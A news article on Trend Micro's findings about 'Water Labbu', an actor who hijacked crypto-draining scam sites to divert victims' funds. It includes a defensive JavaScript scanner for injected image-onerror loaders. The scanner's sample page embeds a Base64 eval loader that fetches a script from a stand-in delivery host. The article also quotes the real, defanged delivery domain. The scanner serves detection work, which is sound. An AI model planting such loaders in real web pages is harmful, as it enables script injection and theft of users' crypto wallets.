Crypto fraudsters are fighting each other for the stolen funds

Cybersecurity researchers have discovered a hacker who broke into cryptocurrency scam sites and diverted the stolen funds into their own wallets, earning hundreds of thousands of dollars in the process.

According to Trend Micro, a threat actor tracked as “Water Labbu” found and compromised 45 fraudulent websites and replaced the scammers' wallet addresses with his own, so any funds the scammers trick victims into handing over actually go to him.

The targeted scam sites pose as liquidity mining pools. In a legitimate liquidity mining pool, users lend their cryptocurrency to a decentralized exchange to form a pool of liquidity, which lets traders swap tokens directly against the pool rather than through a centralized entity that supplies the liquidity. Lenders earn a share of the trading fees.

Fake sites, fake programs

To lend their cryptocurrency, users must connect their wallets to the liquidity mining pool. The fake sites simply wait for people to connect their wallets and then drain them. Building the fake apps and promoting the scam on social media takes considerable effort; Water Labbu skips all of it by letting the original scammers do the hard work.

Trend Micro says the scammer has so far taken more than $300,000 from nine identified victims.

“In one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64-encoded JavaScript payload using the ‘onerror’ event in a so-called XSS evasion technique to bypass cross-site scripting (XSS) filters,” Trend Micro explained in its report. “Then the injected payload creates another script element that loads another script from the delivery server tmpmeta[.]com.”

The script looks for newly connected wallets holding at least 0.005 ETH or 22,000 USDT and, depending on the victim's platform (Windows or one of two mobile platforms), initiates the transfer.
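The injection pattern in the Trend Micro quote above and the balance thresholds, as an added example: this is not Trend Micro's or the attacker's code, and the sample page, the stage-1 loader and the delivery host `delivery.example.invalid` are constructed for illustration. It shows how a defender scanning a site for such a compromise would locate `<img onerror>` handlers, decode the Base64 payload and recover the second-stage script URL, and how the reported thresholds translate into ETH wei and USDT base units.

```javascript
// Added example, not code from Trend Micro or the Water Labbu actor.
// Scans HTML for the "<img onerror=eval(atob(...))>" loader pattern,
// decodes the Base64 stage and extracts any script URLs it references.

// Constructed stage-1 loader: creates a <script> element pointing at a
// hypothetical delivery server (the .invalid TLD is reserved, never live).
const STAGE1 =
  'var s=document.createElement("script");' +
  's.src="https://delivery.example.invalid/loader.js";' +
  'document.head.appendChild(s);';

// Constructed sample page: a mock "liquidity mining" site with one injected
// tag and one benign image, so the scanner has something to ignore.
const SAMPLE_HTML = `<html><body><h1>Liquidity Mining Pool</h1>
<img src="x" onerror="eval(atob('${Buffer.from(STAGE1).toString("base64")}'))">
<img src="/logo.png" alt="logo">
</body></html>`;

function findOnerrorLoaders(html) {
  const findings = [];
  // Any <img> tag carrying an onerror handler, quoted with " or '.
  const imgRe = /<img\b[^>]*\bonerror\s*=\s*(["'])([\s\S]*?)\1[^>]*>/gi;
  let m;
  while ((m = imgRe.exec(html)) !== null) {
    const handler = m[2];
    const finding = { tag: m[0], handler, decoded: null, scriptUrls: [] };
    // Base64 literals passed to atob(); decode each to expose the stage.
    const b64Re = /atob\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)/g;
    let b;
    while ((b = b64Re.exec(handler)) !== null) {
      const decoded = Buffer.from(b[2], "base64").toString("utf8");
      finding.decoded = decoded;
      // Recover URLs the decoded stage assigns to a script's src.
      const urlRe = /\.src\s*=\s*(["'])([^"']+)\1/g;
      let u;
      while ((u = urlRe.exec(decoded)) !== null) finding.scriptUrls.push(u[2]);
    }
    findings.push(finding);
  }
  return findings;
}

// Targeting thresholds reported by Trend Micro, in on-chain base units:
// ETH has 18 decimals (wei); USDT on Ethereum has 6 decimals. BigInt
// avoids floating-point error when comparing token balances.
const MIN_ETH_WEI = 5n * 10n ** 15n;      // 0.005 ETH
const MIN_USDT_UNITS = 22000n * 10n ** 6n; // 22,000 USDT

function isTargetWallet(ethWei, usdtUnits) {
  return ethWei >= MIN_ETH_WEI || usdtUnits >= MIN_USDT_UNITS;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(findOnerrorLoaders(SAMPLE_HTML), null, 2));
  console.log("0.005 ETH wallet targeted:", isTargetWallet(MIN_ETH_WEI, 0n));
}
```

Run with `node` to print the findings for the constructed page. Real payloads are often obfuscated beyond a plain `atob()` call, so treat the decoder as a starting point: the durable signal is an image tag whose `onerror` handler evaluates code or creates script elements, which no legitimate page needs.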

To protect against such scams, Trend Micro warns, users should be very careful about which sites they connect their wallets to and do their due diligence before handing over their tokens.

Via: BleepingComputer